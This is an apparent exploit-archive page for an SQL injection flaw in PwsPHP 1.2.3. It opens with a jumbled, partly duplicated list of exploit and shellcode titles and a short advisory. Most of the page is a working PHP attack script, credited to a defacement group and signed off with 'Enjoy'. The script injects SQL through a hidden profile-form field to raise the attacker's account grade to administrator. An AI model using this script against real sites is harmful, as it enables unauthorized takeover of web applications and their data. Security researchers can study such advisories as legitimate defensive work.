
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
75 lines
No EOL
3.6 KiB
PHP
75 lines
No EOL
3.6 KiB
PHP
source: https://www.securityfocus.com/bid/16567/info
|
|
|
|
PwsPHP is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
|
|
|
|
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
This issue is reported to affect version 1.2.3; other versions may also be vulnerable.
|
|
|
|
<?php
|
|
|
|
/*
|
|
|
|
PwsPHP 1.2.3 & <? Remote Root
|
|
magic quote: Off
|
|
Credited: papipsycho
|
|
write code: papipsycho
|
|
for: G0t R00t ? Amd [W]orld [D]efacers
|
|
Website: http://www.papipsycho.com & http://www.worlddefacers.net
|
|
Date: 09/02/2006
|
|
|
|
to connect and logged with the cookie then to launch the exploit
|
|
Enjoy.
|
|
|
|
*/
|
|
|
|
echo "<title>PwsPHP 1.2.3 & <? Remote Root :: By Papipsycho</title>"
|
|
. "to connect and logged with the cookie then to launch the exploit<br>Enjoy.<br><br>";
|
|
|
|
if(empty($_POST['url']) AND empty($_POST['pseudo']) AND empty($_POST['pass']) AND empty($_POST['nom']))
|
|
{
|
|
echo "<form method=\"post\" action=\"pws-root_paps.php\">"
|
|
. "Pseudo: <input type=\"text\" name=\"pseudo\"><br>"
|
|
. "Pass: <input type=\"text\" name=\"pass\"><br>"
|
|
. "Id: <input type=\"text\" name=\"id\"><br>"
|
|
. "Name: <input type=\"text\" name=\"nom\"><br>"
|
|
. "Mail: <input type=\"text\" name=\"mail\"><br>"
|
|
. "Url: <input type=\"text\" name=\"url\" value=\"http://example.com/pwsphp\"><br>"
|
|
. "<input type=\"submit\" value=\"Send\">"
|
|
. "</form>";
|
|
}
|
|
else
|
|
{
|
|
$url = $_POST['url'];
|
|
$pseudo = $_POST['pseudo'];
|
|
$pass = $_POST['pass'];
|
|
$pass_md5 = md5($pass);
|
|
$nom = $_POST['nom'];
|
|
$mail = $_POST['mail'];
|
|
$id = $_POST['id'];
|
|
|
|
echo "<form method=\"post\" name=\"new_user\" action=\"$url/profil.php\" id=\"formulaire\">"
|
|
. "<input type=\"hidden\" name=\"pseudo\" value=\"$pseudo\">"
|
|
. "<input type=\"hidden\" name=\"nom\" value=\"$nom\">"
|
|
. "<input type=\"hidden\" name=\"pass2\" value=\"$pass\">"
|
|
. "<input type=\"hidden\" name=\"oldpass\" value=\"$pass_md5\">"
|
|
. "<input type=\"hidden\" name=\"email\" value=\"$mail\">"
|
|
. "<input type=\"hidden\" name=\"aff_email\" value=\"1\">"
|
|
. "<input type=\"hidden\" name=\"mp_popup\" value=\"1\">"
|
|
. "<input type=\"hidden\" name=\"popup\" value=\"1\">"
|
|
. '<input type="hidden" name="aff_news_form" value=\'10",grade="4" WHERE `users`.`pseudo`="' . $pseudo . '" AND `users`.`id`="' .$id . '"/*\'>'
|
|
. "<input type=\"hidden\" name=\"icq\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"aim\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"msn\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"yahoom\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"site\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"localisation\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"urlavatar\" value=\"images/avatars/1.gif\">"
|
|
. "<input type=\"hidden\" name=\"signatue\" value=\"\">"
|
|
. "<input type=\"hidden\" name=\"ok\" value=\"1\">"
|
|
. "<input type=\"hidden\" name=\"id\" value=\"$id\">"
|
|
. "<input type=\"hidden\" name=\"ac\" value=\"modifier\">"
|
|
. "<center><input type=\"submit\" value=\"Clic Here\"></center>"
|
|
. "</form>";
|
|
}
|
|
?>
|